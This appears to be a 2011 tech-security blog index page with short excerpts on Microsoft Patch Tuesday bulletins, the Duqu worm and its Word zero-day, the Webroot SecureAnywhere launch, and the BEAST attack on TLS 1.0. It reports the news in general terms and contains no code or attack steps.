Microsoft Leaves Duqu Worm Exploit Unpatched

Today is Microsoft’s Patch Tuesday for the month of November--the eleventh Patch Tuesday of 2011. It is a light month from Microsoft, with only four security bulletins. The big news, though, is that a zero day flaw being exploited by the Duqu worm is not among the vulnerabilities fixed by Microsoft today.

The addition of four security bulletins this month brings the total for the year so far to 86. Of the four security bulletins, one is rated as Critical, two are Important, and one is ranked as a Moderate threat.

Microsoft released four security bulletins for November's Patch Tuesday.
The biggest concern this month--aside from the unpatched Duqu zero day--is MS11-083. It is rated as Critical because a successful exploit could allow an attacker to assume complete control of the vulnerable system. The immediate threat, though, is reduced by the level of technical difficulty in successfully exploiting the flaw.

Read more »


Duqu Worm Targets Microsoft Zero Day Flaw

New details are emerging regarding the Duqu worm. CrySyS Labs--the team that originally discovered the Duqu malware to begin with--has intercepted one of the files that actually installs the malware on target systems. It seems that Duqu is exploiting a zero day vulnerability in Microsoft Word to spread.

According to the researchers at CrySyS, Duqu installs using a Microsoft Word zero day exploit that targets a kernel vulnerability allowing the malware to install. When a victim opens a malicious Microsoft Word document, the main elements of the Duqu worm are installed on the compromised system.

Duqu worm targets zero day flaw in Microsoft Office.
The fact that security researchers were able to recover and analyze one of the dropper files used to install Duqu is encouraging, but researchers also caution that this may not be the only attack vector. The recovered dropped file was intended to target one specific organization, and it had a built-in eight-day expiration window. It is possible that other Duqu attacks could use variants of malicious Microsoft Word documents, or they could use entirely different means to accomplish the initial compromise.

Read more »


Duqu: New Malware Is Stuxnet 2.0

Researchers have identified a new malware threat which has been dubbed "Duqu". The new threat is apparently developed by the same author who developed the Stuxnet worm that was used in targeted attacks against Iranian nuclear power plants, but Duqu has its sights set on a completely different target.

Independent researchers in Europe have shared the malware code with researchers at McAfee and Symantec, and all parties agree that Duqu is built on the same source code as Stuxnet. A blog post from Symantec explains, "Duqu is essentially the precursor to a future Stuxnet-like attack. The threat was written by the same authors (or those that have access to the Stuxnet source code) and appears to have been created since the last Stuxnet file was recovered."

Laptop infected with malware
Stuxnet seems to have been reincarnated as "Duqu".
Although the core code may be the same, A McAfee Labs blog post says that Duqu does not have the PLC-compromising capabilities of its predecessor. Duqu installs drivers and encrypted DLLs on infected machines similar to the original Stuxnet, though, and McAfee claims that the code used for the injection attack, and several of the encryption keys and techniques used by Duqu are all close to those used by Stuxnet.

Read more »


Patch Internet Explorer Now

Yesterday was Microsoft's Patch Tuesday for the month of October. There were a total of eight new security bulletins--not too many, but enough to keep IT admins busy for a while. While most of the vulnerabilities addressed are not imminent threats, security experts are virtually unanimous that patching Internet Explorer should be priority one.

First, let's take a brief look at the security bulletins Microsoft released for Patch Tuesday:

  • Internet Explorer
    Security experts agree that patching Internet Explorer is a priority.
    MS11-075 (Vulnerability in Microsoft Active Accessibility Could Allow Remote Code Execution): Could be exploited to run malicious code from a rogue DLL file.
  • MS11-076 (Vulnerability in Windows Media Center Could Allow Remote Code Execution): Addresses a publicly disclosed vulnerability in Windows Media Center that could be used to run malicious code from a rogue DLL file.
  • MS11-077 (Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution): Fixes four different vulnerabilities in Microsoft Windows, including one that could allow an attacker to execute malicious code by luring someone to open a malicious font file.
  • MS11-078 (Vulnerability in .NET Framework and Microsoft Silverlight Could Allow Remote Code Execution): Fixes a critical vulnerability in .NET Framework and Microsoft Silverlight that can be exploited to run malicious code when someone visits a compromised website.
  • MS11-079 (Vulnerabilities in Microsoft Forefront Unified Access Gateway Could Cause Remote Code Execution): Resolves five vulnerabilities in Microsoft Forefront Unified Access Gateway, one of which could enable an attacker to execute malicious code by luring the user to visit a compromised website.
  • MS11-080 (Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege): Deals with a possible elevation of privileges vulnerability, but an attacker would have to log on locally to the system using valid credentials, so this presents very little risk.
  • MS11-081 (Cumulative Security Update for Internet Explorer): This month's Cumulative Security Update for Internet Explorer addresses eight vulnerabilities, including one which can be used to execute malicious code simply by luring a user to visit a compromised website.
  • MS11-082 (Vulnerabilities in Host Integration Server Could Allow Denial of Service): Deals with two vulnerabilities in Host Integration Server that could be used for a denial of service attack.
Read more »


Critical Updates Coming from Microsoft Next Week

Next Tuesday is the second Tuesday in October, and that means it is Microsoft Patch Tuesday. Overall, it is a moderate month in terms of patch volume, but the couple that are rated as Critical should be addressed quickly to prevent exploits.

According to the Microsoft Security Bulletin Advance Notification for October 2011, we can expect a total of eight security bulletins next Tuesday--not the smallest Patch Tuesday ever, but also far short of the biggest. Two of the security bulletins are rated as Critical, with the remaining six classified as Important.

PC security radar
Microsoft will release eight security bulletins next Tuesday--two rated as Critical.
The affected software includes Windows, the Microsoft Forefront Unified Access Gateway, Microsoft Host Integration Server, the Internet Explorer Web browser, .NET Framework, and Microsoft Silverlight. The Critical updates affect Internet Explorer, and .NET Framework / Silverlight.

Read more »


Webroot SecureAnywhere Brings Cross-Platform Protection to the Cloud

Computer and data security is becoming a much more complex issue to manage for many businesses and consumers. Webroot hopes to simplify it, and make sure you are protected no matter what device or platform you might be using with the launch of SecureAnywhere.

Security used to amount to simply installing some anti-malware product on the PC and keeping it up to date to detect the latest threats. But, now users do more online, and connect with the world through social networks, and access data while on the go from smartphones and tablets. The old school model of security no longer applies.

Webroot SecureAnywhere
Webroot offers a variety of SecureAnywhere products.
"For far too long, people have endured a miserable experience with their PC security," said Dick Williams, CEO, Webroot. "Security vendors, including Webroot, have expected customers to buy, install, and manage security products by themselves. This industry has been delivering products that are less and less effective against threats from zero-day exploits, social engineering, and other sophisticated techniques we see today. Webroot is taking the misery out of security. Webroot SecureAnywhere is the fastest, lightest, and the least demanding--so people are free to do what they want online."

Read more »


Hackers Crack Internet Encryption: Should You Be Worried?

Hackers Crack Internet Encryption: Should You Be Worried?
Data encryption is the cornerstone of Internet security. Every time you log into your email account or sign into an online retailer like Amazon, chances are that your browser is establishing a secure connection to the server using an encryption technology called TLS (Transport Layer Security).

First developed in 1999 as an improvement over SSL (Secure Socket Layer) 3.0 encryption, TLS 1.0 is used as part of HTTPS encryption and is now the Web standard for data encryption. Almost all websites and browsers use TLS to secure information being transferred between you and the site, and now security researchers Thai Duong and Juliano Rizzo claim to have cracked TSL 1.0 encryption using just a traffic sniffer and a simple bit of JavaScript code.

Duong and Rizzo performed a live demonstration of the exploit, codenamed BEAST (Browser Exploit Against SSL/TLS), at the Ekoparty security conference in Buenos Aires during mid-September. While the details of the attack are highly technical, we now know it starts with a snippet of JavaScript code that infects your browser when you follow a suspicious link or visit a malicious website.

Read more »